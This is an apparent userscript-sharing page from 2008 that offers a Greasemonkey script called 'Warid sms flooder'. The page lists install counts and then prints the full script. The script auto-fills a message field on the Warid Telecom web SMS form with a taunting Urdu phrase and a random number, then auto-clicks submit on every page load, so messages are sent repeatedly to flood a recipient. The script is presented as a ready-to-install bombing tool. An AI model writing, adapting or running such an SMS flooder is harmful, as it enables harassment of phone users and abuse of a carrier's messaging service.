Warid sms flooder

By Gasoline- Last update Aug 19, 2008 — Installed 488 times. Daily Installs: 0, 0, 0, 1, 1, 0, 0, 6, 0, 0, 0, 0, 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 2, 0, 2, 1

There are 1 previous version of this script.

// ==UserScript==

// @name Warid sms flooder

// @description Warid SMS FLOODER/BOMBER

// @include https://www.waridtel.com/cgi-bin/*

// ==/UserScript==

window.addEventListener("load", function(e) {

var i=Math.floor(Math.random()*6346);

document.forms[0].elements[11].value='Bindass say hamaisha bachnay ko mangtha hay kia. ' + i ;

document.location.href="javascript:document.forms[0].elements[13].click()";

}, false);